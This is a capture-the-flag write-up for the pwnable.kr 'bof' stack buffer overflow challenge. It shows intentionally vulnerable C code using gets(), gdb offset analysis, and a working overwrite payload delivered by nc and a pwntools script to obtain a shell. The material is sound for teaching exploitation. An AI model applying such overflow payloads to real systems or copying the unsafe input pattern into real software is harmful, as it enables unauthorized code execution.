pwnable.kr - bof

01 Jul 2020

---

Prompt

Nana told me that buffer overflow is one of the most common software vulnerability. Is that true?

Download : http://pwnable.kr/bin/bof Download : http://pwnable.kr/bin/bof.c

Running at : nc pwnable.kr 9000

Solution

Download bof.c:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
        char overflowme[32];
        printf("overflow me : ");
        gets(overflowme);       // smash me!
        if(key == 0xcafebabe){
                system("/bin/sh");
        }
        else{
                printf("Nah..\n");
        }
}
int main(int argc, char* argv[]){
        func(0xdeadbeef);
        return 0;
}

We have a input buffer of 32 bytes allocated for us, but we can supply as many characters as we want. From the logic, we should try to overwrite 0xdeadbeef with 0xcafebabe to get our shell.

$ nc pwnable.kr 9000
this_is_33_characters_long_______
*** stack smashing detected ***: /home/bof/bof terminated
overflow me :
Nah..

Let’s run it through gdb, and put a breakpoint at the comparison.

$ gdb bof
gdb-peda$ break main
Breakpoint 1 at 0x68d
gdb-peda$ r
...
gdb-peda$ disas func
...
0x56555654 <+40>:	cmp    DWORD PTR [ebp+0x8],0xcafebabe
...
gdb-peda$ break *0x56555654
Breakpoint 2 at 0x56555654
gdb-peda$ c 
Continuing.
overflow me :
AAAAAAAA
...
gdb-peda$ x/50wx $esp
0xffffd180:	0xffffd19c	0xffffd284	0xf7fad000	0xf7fab9e0
0xffffd190:	0x00000000	0xf7fad000	0xf7ffc800	0x41414141
0xffffd1a0:	0x41414141	0xf7fad000	0x00000001	0x5655549d
0xffffd1b0:	0xf7fad3fc	0x00040000	0x56556ff4	0xf9cac400
0xffffd1c0:	0x00800000	0x56556ff4	0xffffd1e8	0x5655569f
0xffffd1d0:	0xdeadbeef	0x00000000	0x565556b9	0x00000000
...

I supplied AAAAAAAA because its hex code would be easy to find: see the two groupings of 0x41414141. There are 52 characters from the start of 0x41414141 to 0xdeadbeef. To overflow, we need 52 of any character and then 0xcafebabe.

0xcafebabe --> '\xbe\xba\xfe\xca'

Now, to make our payload. FYI, I find it easier to mess around with byte code in Python2 than in Python3.

python -c "print 'A' * 52 + '\xbe\xba\xfe\xca'" > overflow

We can pipe in our payload to bof: cat overflow | ./bof, but we won’t be able to see any output. BUT, if we cat again we can redirect the shell to our stdin and stdout.

root@kali:~# (cat overflow; cat) | ./bof
overflow me :
whoami
root

Let’s grab the flag.

root@kali:~# (cat overflow; cat) | nc pwnable.kr 9000
whoami
bof
cat flag
{flag censored}

Alternatively, we can use pwntools to get an interactive shell.

#!/usr/bin/python
from pwn import *

URL = 'pwnable.kr'
PORT = 9000
PAYLOAD = 'A' * 52 + '\xbe\xba\xfe\xca'

shell = remote(URL,PORT)
shell.send(PAYLOAD)
shell.interactive()

Running, solve.py:

root@kali:~# python solve.py 
[+] Opening connection to pwnable.kr on port 9000: Done
[*] Switching to interactive mode
$ whoami
bof
$ cat flag
{flag censored}